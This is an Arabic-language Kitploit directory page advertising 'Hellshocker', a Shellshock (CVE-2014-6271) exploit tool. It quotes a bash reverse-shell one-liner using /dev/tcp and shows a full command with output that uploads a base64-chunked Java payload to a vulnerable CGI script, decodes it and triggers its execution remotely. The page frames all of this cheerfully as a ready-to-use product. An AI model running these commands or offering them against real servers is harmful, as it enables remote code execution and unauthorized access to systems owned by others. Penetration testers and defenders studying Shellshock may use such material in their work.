Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/0x00-0x00/cve-2014-6271
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHub0x00-0x00/cve-2014-6271

CVE-2014-6271

سكريبت استغلال ثغرة Shellshock قادر على الرفع وتنفيذ الأوامر عن بُعد (RCE) باستخدام أي ناقل بفضل تعدد استخداماته.

عرض المستودع
322منذ 8 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Hellshocker 0.1.1

أداة لاستغلال ثغرة Shellshock

هل سئمت من استخدام استغلالات ضعيفة لثغرة shellshock أو مجرد استخدام "/bin/bash >& /dev/tcp/IP/port 0>&1" للوصول إلى الخادم؟

نعم، تحتاج إلى رفع وتنفيذ شيء أكثر تعقيدًا على الخادم، وترميز ملف ضخم بقاعدة 64 (base64) أمر مستحيل لأن طلب HTTP الخاص بك لن يُقبل من قبل خادم الويب.

قد تنتهي مشاكلك مع هذه الأداة. فهي قادرة على ترميز الحمولة (payload) الخاصة بك إلى base64 وإرسالها على شكل أجزاء (بشكل افتراضي 128 بايت) إلى خادم الويب، ثم بعد إرسالها، تقوم بفك الترميز وتنفيذها.

"واو"، تقول، "لكن ليس لدي PHP، أحتاج شيئًا لجافا." لا مشكلة، أقول، هذه الأداة قابلة للتخصيص بدرجة كبيرة.

فقط انظر إلى هذا:

root@kitploit:~
python hellshocker.py --cgi http://website.com/cgi-bin/vulnerable --payload "java.jar" --destination "/tmp/java.jar" --trigger "/usr/bin/java -jar /tmp/java.jar" --base64
[*] Splitting data into chunks ...
[+] Payload data has been encoded to base64 format.
[*] There is 19 chunks to be sent to remote server
[*] Starting payload upload ...
[*] Uploading chunk #1
[*] Uploading chunk #2
[*] Uploading chunk #3
[*] Uploading chunk #4
[*] Uploading chunk #5
[*] Uploading chunk #6
[*] Uploading chunk #7
[*] Uploading chunk #8
[*] Uploading chunk #9
[*] Uploading chunk #10
[*] Uploading chunk #11
[*] Uploading chunk #12
[*] Uploading chunk #13
[*] Uploading chunk #14
[*] Uploading chunk #15
[*] Uploading chunk #16
[*] Uploading chunk #17
[*] Uploading chunk #18
[*] Uploading chunk #19
[+] Upload procedure has been completed.
[*] Decoding base64-encoded payload on remote server ...
[+] Remote command for decoding has been sent successfully sent.
[*] Triggering payload to execute ...
[+] Trigger command for payload execution has been succesfully sent.

ثم تم نقل حمولتك بنجاح وتنفيذها. أليس هذا رائعًا؟ أجل، إنه كذلك.

تنزيل الأداة